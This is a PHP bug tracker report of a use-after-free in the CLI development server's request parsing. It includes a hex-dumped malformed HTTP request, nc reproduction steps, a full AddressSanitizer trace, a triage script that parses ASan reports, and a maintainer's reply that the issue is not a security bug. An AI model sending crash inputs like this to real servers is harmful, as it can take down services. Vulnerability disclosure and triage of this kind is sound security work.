Bug #74838 Use-after-free in php_cli_server_client_read_request()
Submitted: 2017-07-01 03:28 UTC Modified: 2017-07-02 01:53 UTC
Votes:1
Avg. Score:2.0 ± 0.0
Reproduced:0 of 1 (0.0%)
From: l dot wei at ntu dot edu dot sg Assigned:
Status: Open Package: CGI/CLI related
PHP Version: 7.1.6 OS: Ubuntu Linux x86
Private report: No CVE-ID: None
 [2017-07-01 03:28 UTC] l dot wei at ntu dot edu dot sg
Description:
------------
A malformed HTTP packet is able to trigger a use-after-free in the CLI server shipped with PHP. Demonstrated on x86 Ubuntu with php-7.1.6 ASan build. 

Build options:
CC="`which gcc`" CFLAGS="-O0 -g -fsanitize=address" ./configure --prefix="`pwd`/../php7_x86/asan" --disable-shared --enable-mbstring --enable-wddx

Save the hex dump of min_repro.zip to min_repro.hex

$ xxd -r min_repro.hex > min_repro.zip
$ unzip min_repro.zip  // to min_repro
$ export USE_ZEND_OPTIONS=0
$ asan/bin/php -S 127.0.0.1:12345

In another terminal, do
$ cat min_repro | nc 127.0.0.1 12345

It may take a few tries to reproduce the issue.

Test script:
---------------
$ xxd -g 1 min_repro.zip 
0000000: 50 4b 03 04 14 00 02 00 08 00 4e 51 e1 4a 88 f3  PK........NQ.J..
0000010: 3e ba 38 00 00 00 ff 17 00 00 09 00 1c 00 6d 69  >.8...........mi
0000020: 6e 5f 72 65 70 72 6f 55 54 09 00 03 93 04 57 59  n_reproUT.....WY
0000030: b2 04 57 59 75 78 0b 00 01 04 e8 03 00 00 04 e8  ..WYux..........
0000040: 03 00 00 ed c8 a1 11 80 30 10 00 41 9f 2a be 02  ........0..A.*..
0000050: 78 2c 15 c4 c1 4c 42 ff ad 30 88 04 41 03 88 5d  x,...LB..0..A..]
0000060: 71 e2 ce a3 f5 58 73 88 fa 74 5b b2 5c f3 ed 91  q....Xs..t[.\...
0000070: af f2 39 00 00 00 00 00 c0 cf dc 50 4b 01 02 1e  ..9........PK...
0000080: 03 14 00 02 00 08 00 4e 51 e1 4a 88 f3 3e ba 38  .......NQ.J..>.8
0000090: 00 00 00 ff 17 00 00 09 00 18 00 00 00 00 00 01  ................
00000a0: 00 00 00 80 81 00 00 00 00 6d 69 6e 5f 72 65 70  .........min_rep
00000b0: 72 6f 55 54 05 00 03 93 04 57 59 75 78 0b 00 01  roUT.....WYux...
00000c0: 04 e8 03 00 00 04 e8 03 00 00 50 4b 05 06 00 00  ..........PK....
00000d0: 00 00 01 00 01 00 4f 00 00 00 7b 00 00 00 00 00  ......O...{.....

Expected result:
----------------
No Crash (Malformed HTTP request)

Actual result:
--------------
$ asan/bin/php -S 127.0.0.1:12345
PHP 7.1.6 Development Server started at Sat Jul  1 10:56:27 2017
Listening on http://127.0.0.1:12345
Document root is /home/weilei/php7_x86
Press Ctrl-C to quit.
=================================================================
==30329== ERROR: AddressSanitizer: heap-use-after-free on address 0xb57048b3 at pc 0x92208a9 bp 0xbfadcca8 sp 0xbfadcc9c
READ of size 1 at 0xb57048b3 thread T0
    #0 0x92208a8 in php_cli_server_client_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1726
    #1 0x9227e83 in php_cli_server_recv_event_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2329
    #2 0x9228940 in php_cli_server_do_event_for_each_fd_callback /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2424
    #3 0x921aade in php_cli_server_poller_iter_on_active /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:841
    #4 0x9228ad3 in php_cli_server_do_event_for_each_fd /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2442
    #5 0x9228bec in php_cli_server_do_event_loop /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2452
    #6 0x9229216 in do_cli_server /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2554
    #7 0x920c626 in main /home/weilei/php-7.1.6/sapi/cli/php_cli.c:1384
    #8 0xb5ab8a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
    #9 0x80667d0 in _start (/home/weilei/php7_x86/asan/bin/php+0x80667d0)
0xb57048b3 is located 3 bytes inside of 5-byte region [0xb57048b0,0xb57048b5)
freed by thread T0 here:
    #0 0xb6167774 (/usr/lib/i386-linux-gnu/libasan.so.0+0x16774)
    #1 0x921fa5e in php_cli_server_client_read_request_on_header_value /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1623
    #2 0x9211145 in php_http_parser_execute /home/weilei/php-7.1.6/sapi/cli/php_http_parser.c:1569
    #3 0x922060d in php_cli_server_client_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1712
    #4 0x9227e83 in php_cli_server_recv_event_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2329
    #5 0x9228940 in php_cli_server_do_event_for_each_fd_callback /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2424
    #6 0x921aade in php_cli_server_poller_iter_on_active /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:841
    #7 0x9228ad3 in php_cli_server_do_event_for_each_fd /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2442
    #8 0x9228bec in php_cli_server_do_event_loop /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2452
    #9 0x9229216 in do_cli_server /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2554
    #10 0x920c626 in main /home/weilei/php-7.1.6/sapi/cli/php_cli.c:1384
    #11 0xb5ab8a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
previously allocated by thread T0 here:
    #0 0xb6167854 (/usr/lib/i386-linux-gnu/libasan.so.0+0x16854)
    #1 0x8c86d58 in __zend_malloc /home/weilei/php-7.1.6/Zend/zend_alloc.c:2820
    #2 0x8c84c71 in _safe_malloc /home/weilei/php-7.1.6/Zend/zend_alloc.c:2477
    #3 0x92207a7 in php_cli_server_client_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1722
    #4 0x9227e83 in php_cli_server_recv_event_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2329
    #5 0x9228940 in php_cli_server_do_event_for_each_fd_callback /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2424
    #6 0x921aade in php_cli_server_poller_iter_on_active /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:841
    #7 0x9228ad3 in php_cli_server_do_event_for_each_fd /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2442
    #8 0x9228bec in php_cli_server_do_event_loop /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2452
    #9 0x9229216 in do_cli_server /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2554
    #10 0x920c626 in main /home/weilei/php-7.1.6/sapi/cli/php_cli.c:1384
    #11 0xb5ab8a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
SUMMARY: AddressSanitizer: heap-use-after-free /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1726 php_cli_server_client_read_request
Shadow bytes around the buggy address:
  0x36ae08c0: fa fa fd fd fa fa 04 fa fa fa fd fd fa fa 00 00
  0x36ae08d0: fa fa 04 fa fa fa 00 00 fa fa 04 fa fa fa 00 00
  0x36ae08e0: fa fa 04 fa fa fa fd fd fa fa fd fd fa fa 04 fa
  0x36ae08f0: fa fa 00 fa fa fa fd fa fa fa fd fd fa fa 00 04
  0x36ae0900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 05 fa
=>0x36ae0910: fa fa fd fa fa fa[fd]fa fa fa fd fa fa fa fd fd
  0x36ae0920: fa fa 00 04 fa fa 00 03 fa fa 00 03 fa fa 00 00
  0x36ae0930: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fa
  0x36ae0940: fa fa 00 00 fa fa 04 fa fa fa fd fd fa fa 00 00
  0x36ae0950: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x36ae0960: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:     fa
  Heap righ redzone:     fb
  Freed Heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  ASan internal:         fe
==30329== ABORTING
Aborted
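As an added triage aid (example code written for this page, not part of the bug report or of PHP itself), the following script splits an AddressSanitizer use-after-free report into its three stacks (the faulting access, the free, the allocation) and picks out the first frame of each that is not an allocator wrapper. Run over the report quoted above it makes the ownership question visible at a glance: the 5-byte buffer is allocated and later read by php_cli_server_client_read_request, but freed in between by php_cli_server_client_read_request_on_header_value, a parser callback invoked from the same function. The embedded sample is a trimmed excerpt of the report above; the "skip functions whose name looks like an allocator" rule is a heuristic chosen for this example.

```python
import re
from typing import Dict, List, Optional, Tuple

Frame = Tuple[str, str, int]  # (function, source file, line)

# Trimmed excerpt of the ASan report quoted in the bug report (constructed sample input).
SAMPLE_REPORT = """\
==30329== ERROR: AddressSanitizer: heap-use-after-free on address 0xb57048b3 at pc 0x92208a9 bp 0xbfadcca8 sp 0xbfadcc9c
READ of size 1 at 0xb57048b3 thread T0
    #0 0x92208a8 in php_cli_server_client_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1726
    #1 0x9227e83 in php_cli_server_recv_event_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2329
0xb57048b3 is located 3 bytes inside of 5-byte region [0xb57048b0,0xb57048b5)
freed by thread T0 here:
    #0 0xb6167774 (/usr/lib/i386-linux-gnu/libasan.so.0+0x16774)
    #1 0x921fa5e in php_cli_server_client_read_request_on_header_value /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1623
    #2 0x9211145 in php_http_parser_execute /home/weilei/php-7.1.6/sapi/cli/php_http_parser.c:1569
previously allocated by thread T0 here:
    #0 0xb6167854 (/usr/lib/i386-linux-gnu/libasan.so.0+0x16854)
    #1 0x8c86d58 in __zend_malloc /home/weilei/php-7.1.6/Zend/zend_alloc.c:2820
    #2 0x8c84c71 in _safe_malloc /home/weilei/php-7.1.6/Zend/zend_alloc.c:2477
    #3 0x92207a7 in php_cli_server_client_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1722
SUMMARY: AddressSanitizer: heap-use-after-free /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1726 php_cli_server_client_read_request
"""

ERROR_RE = re.compile(r"ERROR: AddressSanitizer: (\S+) on address (0x[0-9a-fA-F]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at (0x[0-9a-fA-F]+)")
REGION_RE = re.compile(r"is located (\d+) bytes inside of (\d+)-byte region")
# Only symbolised frames ("#n 0x... in func file:line") carry a source location.
FRAME_RE = re.compile(r"^\s*#\d+\s+0x[0-9a-fA-F]+ in (\S+) (\S+):(\d+)")

# Heuristic (assumption of this example): a frame whose function name looks like an
# allocator wrapper is not the interesting site; the caller that requested the memory is.
ALLOCATOR_HINTS = ("malloc", "realloc", "calloc", "alloc", "free")


def parse_asan_report(text: str) -> Dict[str, object]:
    """Split an ASan heap error report into its use, free and allocation stacks."""
    kind: Optional[str] = None
    access: Optional[str] = None
    size: Optional[int] = None
    region: Optional[Tuple[int, int]] = None
    stacks: Dict[str, List[Frame]] = {"use": [], "free": [], "alloc": []}
    current: Optional[str] = None
    for line in text.splitlines():
        if m := ERROR_RE.search(line):
            kind = m.group(1)
        elif m := ACCESS_RE.match(line):
            access, size, current = m.group(1), int(m.group(2)), "use"
        elif m := REGION_RE.search(line):
            region, current = (int(m.group(1)), int(m.group(2))), None
        elif line.startswith("freed by thread"):
            current = "free"
        elif line.startswith("previously allocated by thread"):
            current = "alloc"
        elif current and (m := FRAME_RE.match(line)):
            stacks[current].append((m.group(1), m.group(2), int(m.group(3))))
    return {"kind": kind, "access": access, "size": size, "region": region, "stacks": stacks}


def first_interesting_frame(frames: List[Frame]) -> Optional[Frame]:
    """Innermost symbolised frame that is not an allocator wrapper."""
    for frame in frames:
        if not any(hint in frame[0].lower() for hint in ALLOCATOR_HINTS):
            return frame
    return frames[0] if frames else None


def summarize(text: str) -> Dict[str, object]:
    """Reduce a report to the three sites a triager needs plus an ownership hint."""
    parsed = parse_asan_report(text)
    stacks = parsed["stacks"]  # type: ignore[index]
    use = first_interesting_frame(stacks["use"])
    free = first_interesting_frame(stacks["free"])
    alloc = first_interesting_frame(stacks["alloc"])
    offset, region_size = parsed["region"] or (None, None)  # type: ignore[misc]
    # The buffer was allocated and used by the same function but freed elsewhere:
    # a callee released memory its caller still considered its own.
    freed_by_callee = bool(use and alloc and free and use[0] == alloc[0] and free[0] != use[0])
    return {
        "kind": parsed["kind"], "access": parsed["access"], "size": parsed["size"],
        "offset": offset, "region_size": region_size,
        "use": use, "free": free, "alloc": alloc, "freed_by_callee": freed_by_callee,
    }


def render(summary: Dict[str, object]) -> str:
    """One-line triage string of the form kind: use <- freed <- allocated."""
    def site(frame: Optional[Frame]) -> str:
        return "?" if frame is None else f"{frame[0]} ({frame[1].rsplit('/', 1)[-1]}:{frame[2]})"
    line = (f"{summary['kind']}: {summary['access']} of {summary['size']} byte(s) at offset "
            f"{summary['offset']} of {summary['region_size']}-byte region; used in {site(summary['use'])}, "
            f"freed in {site(summary['free'])}, allocated in {site(summary['alloc'])}")
    if summary["freed_by_callee"]:
        line += " [freed by a callee of the allocating function: check ownership hand-off]"
    return line


if __name__ == "__main__":
    print(render(summarize(SAMPLE_REPORT)))
```

The `freed_by_callee` flag is the point of the exercise: when the allocation and the faulting read sit in the same function and the free sits in a function called between them, the fix is an ownership question (who may release the buffer, and is the caller's pointer cleared or the buffer re-read after the callback), which is exactly what a maintainer would look at first at php_cli_server.c lines 1722, 1623 and 1726.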

History
 [2017-07-01 06:47 UTC] l dot wei at ntu dot edu dot sg
Correction to the typo above in repro steps:

export USE_ZEND_ALLOC=0
 [2017-07-01 20:47 UTC] stas@php.net
-Type: Security +Type: Bug
 [2017-07-01 20:47 UTC] stas@php.net
Not a security issue - CLI server is not a production facility.
 [2017-07-02 01:53 UTC] l dot wei at ntu dot edu dot sg
Indeed, they affect some of the dev environments at most. Thanks for the quick response.
Last updated: Thu Dec 03 08:01:23 2020 UTC